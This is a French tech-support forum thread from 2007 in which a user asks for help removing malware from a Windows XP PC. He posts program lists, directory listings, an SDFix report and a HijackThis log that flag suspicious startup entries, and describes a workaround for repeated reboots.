Mise à jour de sécurité pour Windows XP (KB883939)

Mise à jour de sécurité pour Windows XP (KB890046)

Mise à jour de sécurité pour Windows XP (KB893756)

Mise à jour de sécurité pour Windows XP (KB896358)

Mise à jour de sécurité pour Windows XP (KB896422)

Mise à jour de sécurité pour Windows XP (KB896423)

Mise à jour de sécurité pour Windows XP (KB896424)

Mise à jour de sécurité pour Windows XP (KB896428)

Mise à jour de sécurité pour Windows XP (KB896688)

Mise à jour de sécurité pour Windows XP (KB899587)

Mise à jour de sécurité pour Windows XP (KB899588)

Mise à jour de sécurité pour Windows XP (KB899591)

Mise à jour de sécurité pour Windows XP (KB900725)

Mise à jour de sécurité pour Windows XP (KB901214)

Mise à jour de sécurité pour Windows XP (KB903235)

Mise à jour de sécurité pour Windows XP (KB904706)

Mise à jour de sécurité pour Windows XP (KB905414)

Mise à jour de sécurité pour Windows XP (KB905749)

Mise à jour de sécurité pour Windows XP (KB905915)

Mise à jour de sécurité pour Windows XP (KB908519)

Mise à jour de sécurité pour Windows XP (KB908531)

Mise à jour de sécurité pour Windows XP (KB911280)

Mise à jour de sécurité pour Windows XP (KB911562)

Mise à jour de sécurité pour Windows XP (KB911567)

Mise à jour de sécurité pour Windows XP (KB911927)

Mise à jour de sécurité pour Windows XP (KB912812)

Mise à jour de sécurité pour Windows XP (KB912919)

Mise à jour de sécurité pour Windows XP (KB913446)

Mise à jour de sécurité pour Windows XP (KB913580)

Mise à jour de sécurité pour Windows XP (KB914388)

Mise à jour de sécurité pour Windows XP (KB914389)

Mise à jour de sécurité pour Windows XP (KB916281)

Mise à jour de sécurité pour Windows XP (KB917159)

Mise à jour de sécurité pour Windows XP (KB917344)

Mise à jour de sécurité pour Windows XP (KB917422)

Mise à jour de sécurité pour Windows XP (KB917953)

Mise à jour de sécurité pour Windows XP (KB918118)

Mise à jour de sécurité pour Windows XP (KB918439)

Mise à jour de sécurité pour Windows XP (KB918899)

Mise à jour de sécurité pour Windows XP (KB919007)

Mise à jour de sécurité pour Windows XP (KB920213)

Mise à jour de sécurité pour Windows XP (KB920214)

Mise à jour de sécurité pour Windows XP (KB920670)

Mise à jour de sécurité pour Windows XP (KB920683)

Mise à jour de sécurité pour Windows XP (KB920685)

Mise à jour de sécurité pour Windows XP (KB921398)

Mise à jour de sécurité pour Windows XP (KB921883)

Mise à jour de sécurité pour Windows XP (KB922616)

Mise à jour de sécurité pour Windows XP (KB922760)

Mise à jour de sécurité pour Windows XP (KB922819)

Mise à jour de sécurité pour Windows XP (KB923191)

Mise à jour de sécurité pour Windows XP (KB923414)

Mise à jour de sécurité pour Windows XP (KB923689)

Mise à jour de sécurité pour Windows XP (KB923694)

Mise à jour de sécurité pour Windows XP (KB923980)

Mise à jour de sécurité pour Windows XP (KB924191)

Mise à jour de sécurité pour Windows XP (KB924270)

Mise à jour de sécurité pour Windows XP (KB924496)

Mise à jour de sécurité pour Windows XP (KB924667)

Mise à jour de sécurité pour Windows XP (KB925486)

Mise à jour de sécurité pour Windows XP (KB925902)

Mise à jour de sécurité pour Windows XP (KB926255)

Mise à jour de sécurité pour Windows XP (KB926436)

Mise à jour de sécurité pour Windows XP (KB927779)

Mise à jour de sécurité pour Windows XP (KB927802)

Mise à jour de sécurité pour Windows XP (KB928255)

Mise à jour de sécurité pour Windows XP (KB928843)

Mise à jour de sécurité pour Windows XP (KB930178)

Mise à jour de sécurité pour Windows XP (KB931261)

Mise à jour de sécurité pour Windows XP (KB931784)

Mise à jour de sécurité pour Windows XP (KB932168)

Mise à jour pour Windows XP (KB894391)

Mise à jour pour Windows XP (KB896727)

Mise à jour pour Windows XP (KB898461)

Mise à jour pour Windows XP (KB900485)

Mise à jour pour Windows XP (KB904942)

Mise à jour pour Windows XP (KB910437)

Mise à jour pour Windows XP (KB916595)

Mise à jour pour Windows XP (KB920872)

Mise à jour pour Windows XP (KB922582)

Mise à jour pour Windows XP (KB929338)

Mise à jour pour Windows XP (KB930916)

Mise à jour pour Windows XP (KB931836)

MSN Messenger 7.5

MSXML 4.0 SP2 (KB927978)

navigating.de POI-Warner MN5 Edition

Nero OEM

NVIDIA Drivers

OS Pack Works Suite

PCI Audio Applications

PCI Audio Driver

PhotoFiltre

Programme de gestion Camera de Logitech®

QuickTime

RealPlayer

SAGEM F@st 800-840

Sagem Wi-Fi 11g USB adapter

Shockwave

SLD Codec Pack

SuDoku Quest

Synchronisation de Works

VideoLAN VLC media player 0.8.5

WebFldrs XP

Windows Genuine Advantage Notifications (KB905474)

Windows Installer 3.1 (KB893803)

Windows Installer Clean Up

Windows Internet Explorer 7

Windows Media Format 11 runtime

Windows Media Player 11

Windows XP Service Pack 2

XviD MPEG-4 Video Codec

Yazzle by OIN

Le volume dans le lecteur C n'a pas de nom.

Le numéro de série du volume est D0EA-F27E

Répertoire de C:\Program Files

12/05/2007 12:33 <REP> .

12/05/2007 12:33 <REP> ..

23/06/2006 15:39 <REP> Adobe

13/03/2005 10:53 <REP> Ahead

08/03/2007 13:43 <REP> AOL

27/02/2007 20:24 <REP> Assistant Dartybox

27/06/2005 20:31 <REP> AvantGo Connect

26/09/2006 11:03 <REP> Capturino

18/03/2007 12:03 <REP> CCleaner

10/04/2005 17:28 <REP> C-Media

27/06/2005 20:31 <REP> Common Files

10/02/2005 20:25 <REP> ComPlus Applications

10/05/2007 15:54 <REP> eMule

15/01/2007 17:58 <REP> epson

04/12/2005 15:46 <REP> Fax Machine

30/08/2005 19:41 <REP> fdjeux

31/03/2007 21:12 <REP> Fichiers communs

24/04/2007 10:38 <REP> FMS

10/05/2007 18:37 <REP> Grisoft

10/05/2006 16:27 <REP> HardwareDetection

13/05/2007 16:48 <REP> Hijackthis Version Française

09/05/2007 22:02 <REP> Internet Explorer

15/01/2007 17:56 <REP> InterVideo

23/02/2007 11:59 <REP> Java

18/12/2006 20:51 <REP> Lavasoft

31/03/2007 21:12 <REP> Logitech

28/03/2006 13:17 <REP> Matroska Pack

14/12/2006 17:56 <REP> MediaInfo

04/03/2005 19:37 <REP> Messenger

20/03/2007 17:59 <REP> MessengerSkinner

06/03/2007 18:10 <REP> Microsoft ActiveSync

18/02/2005 18:56 <REP> Microsoft Encarta

10/02/2005 20:29 <REP> microsoft frontpage

04/02/2006 20:06 <REP> Microsoft Office

18/02/2005 18:51 <REP> Microsoft Works

18/02/2005 18:44 <REP> Microsoft Works Suite 2001

17/04/2005 22:21 <REP> Microsoft.NET

04/03/2005 18:40 <REP> Movie Maker

03/10/2006 10:47 <REP> MSECACHE

10/02/2005 20:24 <REP> MSN

05/06/2006 16:43 <REP> MSN Games

10/02/2005 20:23 <REP> MSN Gaming Zone

10/09/2006 14:46 <REP> MSN Messenger

16/11/2006 14:20 <REP> MSXML 4.0

26/07/2006 17:25 <REP> NetMeeting

14/12/2006 23:12 <REP> Outlook Express

10/05/2006 10:38 <REP> PCI Audio Applications

15/04/2007 18:15 <REP> PhotoFiltre

27/03/2007 16:47 <REP> POI-Warner MN5 Edition

14/02/2005 09:53 <REP> QuickTime

24/10/2005 12:42 <REP> Real

15/01/2007 17:59 <REP> Resco

08/02/2007 16:53 <REP> SAGEM

08/02/2007 17:09 <REP> SAGEM WiFi manager

10/02/2005 20:26 <REP> Services en ligne

07/03/2005 18:41 <REP> Siber Systems

11/08/2006 14:57 <REP> SLD Codec Pack

21/11/2006 14:53 <REP> VideoLAN

03/10/2006 10:48 <REP> Windows Installer Clean Up

27/10/2006 12:26 <REP> Windows Media Components

15/12/2006 14:35 <REP> Windows Media Connect 2

15/12/2006 14:35 <REP> Windows Media Player

04/03/2005 18:36 <REP> Windows NT

06/03/2005 12:02 <REP> WinRAR

10/02/2005 20:29 <REP> xerox

11/08/2006 14:52 <REP> XviD

0 fichier(s) 0 octets

66 Rép(s) 3 503 730 688 octets libres

Le volume dans le lecteur C n'a pas de nom.

Le numéro de série du volume est D0EA-F27E

Répertoire de C:\Program Files\fichiers communs

31/03/2007 21:12 <REP> .

31/03/2007 21:12 <REP> ..

06/02/2007 11:17 <REP> Adobe

13/03/2005 10:53 <REP> Ahead

17/04/2005 22:20 <REP> DESIGNER

31/03/2007 21:12 <REP> FotoWire

14/04/2005 18:37 <REP> Hewlett-Packard

24/12/2005 15:15 <REP> InstallShield

20/05/2006 15:34 <REP> Java

04/04/2005 17:02 <REP> Logitech

06/03/2007 18:10 <REP> Microsoft Shared

10/02/2005 20:25 <REP> MSSoap

10/02/2005 20:16 <REP> ODBC

24/10/2005 12:43 <REP> Real

10/02/2005 20:25 <REP> Services

10/02/2005 20:16 <REP> SpeechEngines

08/03/2007 12:28 <REP> Symantec Shared

14/12/2006 23:12 <REP> System

24/10/2005 12:43 <REP> xing shared

0 fichier(s) 0 octets

19 Rép(s) 3 503 730 688 octets libres

Le volume dans le lecteur C n'a pas de nom.

Le numéro de série du volume est D0EA-F27E

Répertoire de C:\Program Files\fichiers communs\Microsoft Shared\Web Folders

17/04/2005 22:20 <REP> .

17/04/2005 22:20 <REP> ..

17/04/2005 22:20 <REP> 1033

17/04/2005 22:20 <REP> 1036

11/07/2003 10:15 1 292 872 MSONSEXT.DLL

15/07/2003 06:52 35 896 MSOSV.DLL

03/06/1999 15:09 122 937 MSOWS409.DLL

07/03/2001 10:00 127 033 MSOWS40c.DLL

11/07/2003 02:25 80 448 PKMWS.DLL

5 fichier(s) 1 659 186 octets

4 Rép(s) 3 503 726 592 octets libres

Le volume dans le lecteur C n'a pas de nom.

Le numéro de série du volume est D0EA-F27E

Répertoire de C:\Program Files\common files

27/06/2005 20:31 <REP> .

27/06/2005 20:31 <REP> ..

27/06/2005 20:31 <REP> Microsoft Shared

0 fichier(s) 0 octets

3 Rép(s) 3 503 726 592 octets libres

Le volume dans le lecteur C n'a pas de nom.

Le numéro de série du volume est D0EA-F27E

Répertoire de C:\

08/05/2007 11:48 68 096 diff.exe

08/05/2007 11:48 103 424 grep.exe

2 fichier(s) 171 520 octets

0 Rép(s) 3 503 726 592 octets libres

c:\Documents and Settings\Emilie\Local Settings\Temp\Rar$EX01.133\Setup.exe

c:\Documents and Settings\Emilie\Local Settings\Temp\Rar$EX01.133\Crack No Cd\Dora_Sakado.exe

c:\Documents and Settings\Emilie\Local Settings\Temp\Rar$EX01.133\DirectX\dxsetup.exe

c:\Documents and Settings\Françoise\.limewire\.NetworkShare\LimeWireWin4.12.3.exe

c:\Documents and Settings\Françoise\.limewire\.NetworkShare\LimeWireWinInstaller 1.exe

c:\Documents and Settings\Françoise\.limewire\.NetworkShare\LimeWireWinInstaller.exe

c:\Documents and Settings\Françoise\Local Settings\Temp\jrestub.exe

c:\Documents and Settings\Françoise\Local Settings\Temporary Internet Files\Content.IE5\63IIDUPE\2785.Cdiscount_Alert[1].exe

c:\Documents and Settings\Françoise\Mes documents\Telechargement\LimeWireWin.exe

c:\Documents and Settings\Pascal\Application Data\Adobe\Acrobat\7.0\Updater\AdbeRdr709_en_US.exe

c:\Documents and Settings\Pascal\Application Data\LimeWire\.NetworkShare\LimeWireWin4.12.6-fixed.exe

c:\Documents and Settings\Pascal\Application Data\LimeWire\.NetworkShare\LimeWireWin4.12.6-nopack2.exe

c:\Documents and Settings\Pascal\Application Data\Microsoft\Installer\{121634B0-2F4B-11D3-ADA3-00C04F52DD52}\Icon386ED4E3.exe

c:\Documents and Settings\Pascal\Bureau\SDFix.exe

c:\Documents and Settings\Pascal\Bureau\DiagHelp\catchme.exe

c:\Documents and Settings\Pascal\Bureau\DiagHelp\diff.exe

c:\Documents and Settings\Pascal\Bureau\DiagHelp\dumphive.exe

c:\Documents and Settings\Pascal\Bureau\DiagHelp\FilesInfoCmd.exe

c:\Documents and Settings\Pascal\Bureau\DiagHelp\find2.exe

c:\Documents and Settings\Pascal\Bureau\DiagHelp\Fport.exe

c:\Documents and Settings\Pascal\Bureau\DiagHelp\grep.exe

c:\Documents and Settings\Pascal\Bureau\DiagHelp\LFiles.exe

c:\Documents and Settings\Pascal\Bureau\DiagHelp\LISTDLLS.exe

c:\Documents and Settings\Pascal\Bureau\DiagHelp\pslist.exe

c:\Documents and Settings\Pascal\Bureau\DiagHelp\streams.exe

c:\Documents and Settings\Pascal\Bureau\DiagHelp\swreg.exe

c:\Documents and Settings\Pascal\Bureau\Sdfix\SDFix\Catchme.exe

c:\Documents and Settings\Pascal\Bureau\Sdfix\SDFix\apps\cliptext.exe

c:\Documents and Settings\Pascal\Bureau\Sdfix\SDFix\apps\download.exe

c:\Documents and Settings\Pascal\Bureau\Sdfix\SDFix\apps\LS.exe

c:\Documents and Settings\Pascal\Bureau\Sdfix\SDFix\apps\MD5File.exe

c:\Documents and Settings\Pascal\Bureau\Sdfix\SDFix\apps\MoveEx.exe

c:\Documents and Settings\Pascal\Bureau\Sdfix\SDFix\apps\Process.exe

c:\Documents and Settings\Pascal\Bureau\Sdfix\SDFix\apps\RegDACL.exe

c:\Documents and Settings\Pascal\Bureau\Sdfix\SDFix\apps\RestartIt!.exe

c:\Documents and Settings\Pascal\Bureau\Sdfix\SDFix\apps\sc.exe

c:\Documents and Settings\Pascal\Bureau\Sdfix\SDFix\apps\SF.exe

c:\Documents and Settings\Pascal\Bureau\Sdfix\SDFix\apps\shutdown.exe

c:\Documents and Settings\Pascal\Bureau\Sdfix\SDFix\apps\swreg.exe

c:\Documents and Settings\Pascal\Bureau\Sdfix\SDFix\apps\swsc.exe

c:\Documents and Settings\Pascal\Bureau\Sdfix\SDFix\apps\unzip.exe

c:\Documents and Settings\Pascal\Bureau\Sdfix\SDFix\apps\zip.exe

c:\Documents and Settings\Pascal\Bureau\Sdfix\SDFix\apps\Replace\W2K.exe

c:\Documents and Settings\Pascal\Bureau\Sdfix\SDFix\apps\Replace\XP.exe

c:\Documents and Settings\Pascal\Bureau\Sdfix\SDFix\backups\attrib.exe

c:\Documents and Settings\Pascal\Bureau\Sdfix\SDFix\backups\find.exe

c:\Documents and Settings\Pascal\Bureau\Sdfix\SDFix\backups\findstr.exe

c:\Documents and Settings\Pascal\Bureau\Sdfix\SDFix\backups\regedit.exe

c:\Documents and Settings\Pascal\Menu Démarrer\Programmes\Accessoires\sudoku.exe

c:\Documents and Settings\Pascal\Mes documents\MSASYNC.EXE

c:\Documents and Settings\Pascal\Mes documents\Lavasoft\aawsepersonal.exe

c:\Documents and Settings\Pascal\Mes documents\Lavasoft\pllangs.exe

c:\Documents and Settings\Pascal\Mes documents\Lavasoft\pllspexplorer.exe

c:\Documents and Settings\Pascal\Mes documents\Lavasoft\ploemessenger.exe

c:\Documents and Settings\Pascal\Mes documents\Lavasoft\pltweakse.exe

c:\Documents and Settings\Pascal\Mes documents\Lavasoft\vx2cleaner_inst.exe

c:\Documents and Settings\Pascal\Mes documents\Mes fichiers reçus\CALCCE.EXE

c:\Documents and Settings\Pascal\Mes documents\Mes fichiers reçus\capturino.exe

c:\Documents and Settings\Pascal\Mes documents\Mes fichiers reçus\ccsetup137.exe

c:\Documents and Settings\Pascal\Mes documents\Mes fichiers reçus\eMule0.47c-Installer.exe

c:\Documents and Settings\Pascal\Mes documents\Mes fichiers reçus\eMulePlus-1n.Installer.exe

c:\Documents and Settings\Pascal\Mes documents\Mes fichiers reçus\HIJACKTHIS VF.exe

c:\Documents and Settings\Pascal\Mes documents\Mes fichiers reçus\izispot.exe

c:\Documents and Settings\Pascal\Mes documents\Mes fichiers reçus\MediaInfo_0.7.3.1_GUI_Win32.exe

c:\Documents and Settings\Pascal\Mes documents\Mes fichiers reçus\msicuu2.exe

c:\Documents and Settings\Pascal\Mes documents\Mes fichiers reçus\msjavwu_w.exe

c:\Documents and Settings\Pascal\Mes documents\Mes fichiers reçus\pf-setup.exe

c:\Documents and Settings\Pascal\Mes documents\Mes fichiers reçus\spybotsd14.exe

c:\Documents and Settings\Pascal\Mes documents\Mes fichiers reçus\Windows_Media_Encoder_9.0.exe

c:\Documents and Settings\Pascal\Mes documents\Mes fichiers reçus\xnview-pocket_xnview_pocket_1.31_arm_xscale_francais_13325.exe

c:\Documents and Settings\Pascal\Mes documents\My Music\Website Download (AudioRack WDM, VxD) 1.4.part1.exe

c:\Documents and Settings\Pascal\Mes documents\WindowsCE My Documents\RegEdit.exe

c:\Documents and Settings\Pascal\Mes documents\WindowsCE My Documents\showtaskbar.exe

c:\Documents and Settings\Pascal\Mes documents\Winrar\wrar330fr.exe

c:\Documents and Settings\All Users\Application Data\AOL\AVP6\Bases\avcmhk4.dll

c:\Documents and Settings\All Users\Application Data\Microsoft\IdentityCRL\ppcrlconfig.dll

c:\Documents and Settings\All Users\Application Data\Microsoft\USMT\iconlib.dll

c:\Documents and Settings\Françoise\Application Data\Microsoft\IdentityCRL\ppcrlconfig.dll

c:\Documents and Settings\LocalService\Application Data\Microsoft\UPnP Device Host\upnphost\udhisapi.dll

c:\Documents and Settings\Pascal\Application Data\Microsoft\IdentityCRL\ppcrlconfig.dll

Je me répète mais encore merci pour ton aide.

le 14 mai 2007

Youpi youpi yeah !!!!!!!!!

Je suis parvenu a stoppé le redémarrage de la bête !!!!!!!

En utilisant cette procédure trouvée sur le site de microsft :

En premier lieu, pour empêcher tout redémarrage intempestif de votre ordinateur, après votre identification (compte utilisateur et mot de passe) :

* Cliquez sur Démarrer, puis sur Exécuter. La boîte de dialogue Exécuter apparaît.

* Saisissez SERVICES.MSC dans la ligne Ouvrir et cliquez sur OK. La fenêtre Services s'ouvre alors.

* Dans la liste des services, sélectionnez Appel de procédure distante (RPC).

* Double-cliquez alors sur Appel de procédure distante (RPC).

* Cliquez ensuite sur l'onglet Récupération.

* Pour les options Première défaillance, Deuxième défaillance et Défaillances suivantes, choisissez Redémarrer le service.

* Cliquez enfin sur Appliquer, puis sur OK.

Du coup je vais pouvoir lancer un scan avec Diaghelp... mais pas ce soir parce que là je vais bosser.

A demain pour la suite

le 14 mai 2007

Bonjour Malekal morte,

Tout d'abord, je te remercie de ta perséverance et de ton aide.

Pour ce qui est de la livebox et ben c'est non!!! En fait je suis chez Darty, donc Dartybox qui est un model sagem

Et pour ce qui est du scan avec Diaghelp, tu me l'avais déjà demandé (voir post plus haut) mais malheureusement mon problème de redémarrage fait que je ne peux pas aller au bout du scan....

Voilà donc où j'en suis rendu ce matin

le 13 mai 2007

On en revient toujours au même problème...

Je n'ai pas le temps de ré-installer le wifi.

Ce qui est bizarre, c'est que l'ordinateur accroche bien mon réseau mais ne fais pas la connexion en automatique.

Il de demande de saisir la clef wep. Et là j'ai jamais le temps...

Le soucis majeur c'est qu'outre le fait que le micro redémarre au bout de trois ou quatre minutes, lorsque j'ouvre ma session le bureau disparait et réapparait toutes les minutes (à peu près) et, de fait, interrompt toute activité.

Ce qui laisse très peu de temps à chaque fois pour faire quelque chose...

Y'a qu'en mode sans échec où je n'ai pas de problème d'interruption...

le 13 mai 2007

Voici le rapport SDFix :

SDFix: Version 1.83

Run by Pascal - 13/05/2007 - 16:31:12,10

Microsoft Windows XP [version 5.1.2600]

Running From: C:\DOCUME~1\Pascal\Bureau\Sdfix\SDFix

Safe Mode:

Checking Services:

Restoring Windows Registry Values

Restoring Windows Default Hosts File

Restoring Missing Security Center Service

Restoring Missing SharedAccess Service

Rebooting...

Normal Mode:

Checking Files:

Below files will be copied to Backups folder then removed:

C:\WINDOWS\system32\TFTP1872 - Deleted

C:\WINDOWS\system32\win32.bat - Deleted

Removing Temp Files

ADS Check:

Checking if ADS is attached to system32 Folder

C:\WINDOWS\system32

No streams found.

Checking if ADS is attached to svchost.exe

C:\WINDOWS\system32\svchost.exe

No streams found.

Final Check:

Remaining Services:

------------------

Authorized Application Key Export:

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]

"%windir%\\system32\\sessmgr.exe"="%windir%\\system32\\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019"

"C:\\Program Files\\Microsoft ActiveSync\\wcescomm.exe"="C:\\Program Files\\Microsoft ActiveSync\\wcescomm.exe:*:Enabled:ActiveSync Connection Manager"

"C:\\Program Files\\Microsoft ActiveSync\\WCESMgr.exe"="C:\\Program Files\\Microsoft ActiveSync\\WCESMgr.exe:*:Enabled:ActiveSync Application"

"C:\\Program Files\\Eicon\\Diva 2400 Series\\Assistant.exe"="C:\\Program Files\\Eicon\\Diva 2400 Series\\Assistant.exe:*:Enabled:Afficheur d'état"

"C:\\WINDOWS\\system32\\fxsclnt.exe"="C:\\WINDOWS\\system32\\fxsclnt.exe:*:Enabled:Microsoft Fax Console"

"C:\\Program Files\\Internet Explorer\\iexplore.exe"="C:\\Program Files\\Internet Explorer\\iexplore.exe:*:Enabled:Internet Explorer"

"C:\\WINDOWS\\PCHEALTH\\HELPCTR\\Binaries\\helpctr.exe"="C:\\WINDOWS\\PCHEALTH\\HELPCTR\\Binaries\\helpctr.exe:*:Enabled:Assistance à distance - Windows Messenger et voix"

"C:\\Program Files\\MSN Messenger\\msnmsgr.exe"="C:\\Program Files\\MSN Messenger\\msnmsgr.exe:*:Enabled:MSN Messenger 7.5"

"C:\\Program Files\\eMule\\emule.exe"="C:\\Program Files\\eMule\\emule.exe:*:Enabled:eMule"

"%windir%\\Network Diagnostic\\xpnetdiag.exe"="%windir%\\Network Diagnostic\\xpnetdiag.exe:*:Enabled:@xpsp3res.dll,-20000"

"C:\\Program Files\\Lecteur CANALPLAY\\CanalPlayer.exe"="C:\\Program Files\\Lecteur CANALPLAY\\CanalPlayer.exe:*:Enabled:Lecteur CANALPLAY"

"C:\\Program Files\\Lecteur CANALPLAY\\CanalPlayerHelper.exe"="C:\\Program Files\\Lecteur CANALPLAY\\CanalPlayerHelper.exe:*:Enabled:Lecteur CANALPLAY Helper"

"C:\\Program Files\\Microsoft ActiveSync\\rapimgr.exe"="C:\\Program Files\\Microsoft ActiveSync\\rapimgr.exe:169.254.2.0/255.255.255.0:Enabled:ActiveSync RAPI Manager"

"C:\\Program Files\\AOL\\Active Virus Shield\\avp.exe"="C:\\Program Files\\AOL\\Active Virus Shield\\avp.exe:*:Enabled:Active Virus Shield"

"C:\\Program Files\\Assistant Dartybox\\upgrade_manager.exe"="C:\\Program Files\\Assistant Dartybox\\upgrade_manager.exe:*:Enabled:Mise à Jour pour L'Assistant Dartybox"

"C:\\Program Files\\Logitech\\Desktop Messenger\\8876480\\Program\\LDMConf.exe"="C:\\Program Files\\Logitech\\Desktop Messenger\\8876480\\Program\\LDMConf.exe:*:Enabled:Desktop Messenger"

"C:\\Program Files\\Logitech\\Video\\Launcher.exe"="C:\\Program Files\\Logitech\\Video\\Launcher.exe:*:Enabled:Logitech QuickCam"

"C:\\Program Files\\Logitech\\Print Service\\fwPrint.exe"="C:\\Program Files\\Logitech\\Print Service\\fwPrint.exe:*:Enabled:Logitech Print Service"

"C:\\WINDOWS\\system32\\dpvsetup.exe"="C:\\WINDOWS\\system32\\dpvsetup.exe:*:Enabled:Microsoft DirectPlay Voice Test"

"C:\\WINDOWS\\system32\\rundll32.exe"="C:\\WINDOWS\\system32\\rundll32.exe:*:Enabled:Exécuter une DLL en tant qu'application"

"C:\\Program Files\\Messenger\\msmsgs.exe"="C:\\Program Files\\Messenger\\msmsgs.exe:*:Enabled:Windows Messenger"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List]

"%windir%\\system32\\sessmgr.exe"="%windir%\\system32\\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019"

"C:\\Program Files\\MSN Messenger\\msnmsgr.exe"="C:\\Program Files\\MSN Messenger\\msnmsgr.exe:*:Enabled:MSN Messenger 7.5"

"%windir%\\Network Diagnostic\\xpnetdiag.exe"="%windir%\\Network Diagnostic\\xpnetdiag.exe:*:Enabled:@xpsp3res.dll,-20000"

"C:\\Program Files\\Microsoft ActiveSync\\rapimgr.exe"="C:\\Program Files\\Microsoft ActiveSync\\rapimgr.exe:169.254.2.0/255.255.255.0:Enabled:ActiveSync RAPI Manager"

"C:\\Program Files\\Microsoft ActiveSync\\wcescomm.exe"="C:\\Program Files\\Microsoft ActiveSync\\wcescomm.exe:169.254.2.0/255.255.255.0:Enabled:ActiveSync Connection Manager"

"C:\\Program Files\\Microsoft ActiveSync\\WCESMgr.exe"="C:\\Program Files\\Microsoft ActiveSync\\WCESMgr.exe:169.254.2.0/255.255.255.0:Enabled:ActiveSync Application"

Remaining Files:

---------------

Backups Folder: - C:\DOCUME~1\Pascal\Bureau\Sdfix\SDFix\backups\backups.zip

Checking For Files with Hidden Attributes:

C:\WINDOWS\SRUpdate.dll

C:\Program Files\Fichiers communs\Yazzle1220OinUninstaller.exe

C:\WINDOWS\Navnet.exe

C:\WINDOWS\system3285D493723.sys

C:\WINDOWS\system32\KGyGaAvL.sys

C:\Documents and Settings\All Users\DRM\Cache\Indiv01.tmp

C:\Documents and Settings\Pascal\Mes documents\Demainpeutˆtre\~WRL1887.tmp

Finished

et voici le nouveau rapport Hijackthis :

Logfile of HijackThis v1.99.1

Scan saved at 16:49:05, on 13/05/2007

Platform: Windows XP SP2 (WinNT 5.01.2600)

MSIE: Internet Explorer v7.00 (7.00.6000.16441)

Running processes:

C:\WINDOWS\System32\smss.exe

C:\WINDOWS\system32\winlogon.exe

C:\WINDOWS\system32\services.exe

C:\WINDOWS\system32\lsass.exe

C:\WINDOWS\system32\svchost.exe

C:\WINDOWS\System32\svchost.exe

C:\WINDOWS\system32\svchost.exe

C:\WINDOWS\system32\spoolsv.exe

C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe

C:\Program Files\AOL\Active Virus Shield\avp.exe

C:\WINDOWS\system32\nvsvc32.exe

C:\WINDOWS\System32\svchost.exe

C:\WINDOWS\system32\MsPMSPSv.exe

C:\Program Files\QuickTime\qttask.exe

C:\WINDOWS\Mixer.exe

C:\WINDOWS\system32\LVCOMSX.EXE

C:\Program Files\Fichiers communs\Real\Update_OB\realsched.exe

C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\E_FATIADE.EXE

C:\Program Files\Java\jre1.5.0_11\bin\jusched.exe

C:\Program Files\AOL\Active Virus Shield\avp.exe

C:\Program Files\Logitech\Video\LogiTray.exe

C:\WINDOWS\system32\cmd.exe

C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\avgas.exe

C:\Program Files\Logitech\Video\FxSvr2.exe

C:\WINDOWS\system32\ping.exe

C:\WINDOWS\explorer.exe

C:\Program Files\Hijackthis Version Française\hijackthis vf.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://webmail.dbmail.com/webmail/fr_FR/lo...ml?LOGIN1=panow

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896

R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = http://register.libertysurf.com/dispatch/d...MKTG=PFMPFRPAB7

R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = localhost

R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Liens

O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll

O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.5.0_11\bin\ssv.dll

O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime

O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup

O4 - HKLM\..\Run: [C-Media Mixer] Mixer.exe /startup

O4 - HKLM\..\Run: [WorksFUD] C:\Program Files\Microsoft Works\wkfud.exe

O4 - HKLM\..\Run: [Microsoft Works Portfolio] C:\Program Files\Microsoft Works\WksSb.exe /AllUsers

O4 - HKLM\..\Run: [Microsoft Works Update Detection] C:\Program Files\Microsoft Works\WkDetect.exe

O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck.exe

O4 - HKLM\..\Run: [nwiz] nwiz.exe /install

O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\system32\NvMcTray.dll,NvTaskbarInit

O4 - HKLM\..\Run: [LVCOMSX] C:\WINDOWS\system32\LVCOMSX.EXE

O4 - HKLM\..\Run: [LogitechVideoRepair] C:\Program Files\Logitech\Video\ISStart.exe

O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Fichiers communs\Real\Update_OB\realsched.exe" -osboot

O4 - HKLM\..\Run: [EPSON Stylus DX4800 Series] C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\E_FATIADE.EXE /P26 "EPSON Stylus DX4800 Series" /O6 "USB001" /M "Stylus DX4800"

O4 - HKLM\..\Run: [sunJavaUpdateSched] "C:\Program Files\Java\jre1.5.0_11\bin\jusched.exe"

O4 - HKLM\..\Run: [kav] "C:\Program Files\AOL\Active Virus Shield\avp.exe"

O4 - HKLM\..\Run: [LogitechVideoTray] C:\Program Files\Logitech\Video\LogiTray.exe

O4 - HKLM\..\Run: [Firewall] C:\WINDOWS\Navnet.exe

O4 - HKLM\..\Run: [!AVG Anti-Spyware] "C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\avgas.exe" /minimized

O4 - HKLM\..\RunServices: [Firewall] C:\WINDOWS\Navnet.exe

